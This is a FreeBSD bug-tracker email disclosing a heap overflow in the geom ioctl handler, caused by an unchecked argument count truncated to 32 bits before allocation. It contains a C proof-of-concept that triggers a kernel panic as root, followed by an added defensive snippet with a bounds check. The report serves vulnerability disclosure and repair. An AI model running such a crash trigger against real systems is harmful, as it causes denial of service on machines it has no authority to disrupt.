Date: Wed, 27 Apr 2016 22:41:05 +0000
From: bugzilla-noreply@freebsd.org
To: freebsd-bugs@FreeBSD.org
Subject: [Bug 209113] Heap overflow in geom ioctl handler
Message-ID: <bug-209113-8@https.bugs.freebsd.org/bugzilla/>
https://bugs.freebsd.org/bugzilla/show_bug.cgi?id=209113

            Bug ID: 209113
           Summary: Heap overflow in geom ioctl handler
           Product: Base System
           Version: 11.0-CURRENT
          Hardware: Any
                OS: Any
            Status: New
          Severity: Affects Only Me
          Priority: ---
         Component: kern
          Assignee: freebsd-bugs@FreeBSD.org
          Reporter: cturt@hardenedbsd.org

There is a heap overflow in the `ioctl` handler for `geom`, which is non-critical since it is only triggerable as `root`.

Essentially, there are no checks on the user-supplied `req.narg` value. The code uses this value to calculate a size by multiplying by `sizeof(struct gctl_req_arg)`, and then calls `g_malloc` and `copyin`.

`g_malloc` treats its `size` parameter as an `int`:

    static __inline void *g_malloc(int size, int flags)

So this size will be truncated to 32 bits; however, the `copyin` call will use the full 64-bit size.

PoC to trigger the bug, resulting in a panic (must be run as `root`):

    #include <stdio.h>
    #include <stdlib.h>   /* malloc, free */
    #include <string.h>   /* memset */
    #include <unistd.h>
    #include <fcntl.h>
    #include <errno.h>
    #include <sys/types.h>
    #include <sys/ioctl.h>
    #include <geom/geom_ctl.h>

    int main(void)
    {
        int result;
        struct gctl_req req;
        int g;

        g = open("/dev/geom.ctl", O_RDONLY);
        if (g == -1) {
            printf(" [-] Couldn't open geom.ctl!\n");
            return 1;
        }

        req.error = malloc(0x100);
        req.lerror = 2;
        req.version = GCTL_VERSION;
        req.narg = 0x5555556;           /* unchecked argument count */
        req.arg = malloc(0x4000);
        memset(req.arg, 'a', 0x4000);

        result = ioctl(g, GEOM_CTL, &req);
        printf("%d %d\n", result, errno);

        free(req.arg);
        return 0;
    }

-- 
You are receiving this mail because:
You are the assignee for the bug.
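As an added illustration of the size mismatch described in the report (this is not code from the report or from FreeBSD), the following compares the full 64-bit product that `copyin` would use with the low 32 bits that survive the conversion to `g_malloc`'s `int size`, and shows the kind of bound on `narg` that prevents the mismatch. `ARG_SIZE` stands in for `sizeof(struct gctl_req_arg)` and `MAX_NARG` is a hypothetical sanity limit; both are assumed values.

```c
#include <errno.h>
#include <limits.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

/* Assumed multiplier standing in for sizeof(struct gctl_req_arg); the
 * exact value does not matter for the arithmetic, only that it is fixed. */
#define ARG_SIZE   32u
/* Hypothetical sanity bound on the argument count a request may carry. */
#define MAX_NARG   1024u

/* The size copyin() would be handed: the full 64-bit product.
 * (For absurd narg even this wraps, which is why the hardened check
 * below bounds narg before multiplying rather than checking the result.) */
uint64_t full_size(uint64_t narg)
{
    return narg * ARG_SIZE;
}

/* What survives the implicit conversion to g_malloc's `int size`:
 * only the low 32 bits of the product. */
uint32_t low32_size(uint64_t narg)
{
    return (uint32_t)full_size(narg);
}

/* True when the allocation g_malloc sees no longer matches the number of
 * bytes copyin will write: either the high bits were dropped, or the low
 * 32 bits do not even fit in a non-negative int. */
bool size_mismatch(uint64_t narg)
{
    uint64_t full = full_size(narg);
    uint32_t low  = low32_size(narg);
    return (uint64_t)low != full || low > (uint32_t)INT_MAX;
}

/* Hardened version: validate narg before any multiplication so the
 * product is bounded and fits in an int. Returns 0 and stores the
 * size on success, EINVAL otherwise. */
int checked_arg_size(uint64_t narg, size_t *out)
{
    if (narg == 0 || narg > MAX_NARG)
        return EINVAL;                    /* absurd argument counts */
    if (narg > (uint64_t)(INT_MAX / ARG_SIZE))
        return EINVAL;                    /* product would not fit in int */
    *out = (size_t)narg * ARG_SIZE;
    return 0;
}
```

With the report's `narg` of `0x5555556`, the product is `0xAAAAAAC0`: it fits in 32 bits but exceeds `INT_MAX`, so `size_mismatch` reports it and `checked_arg_size` rejects it.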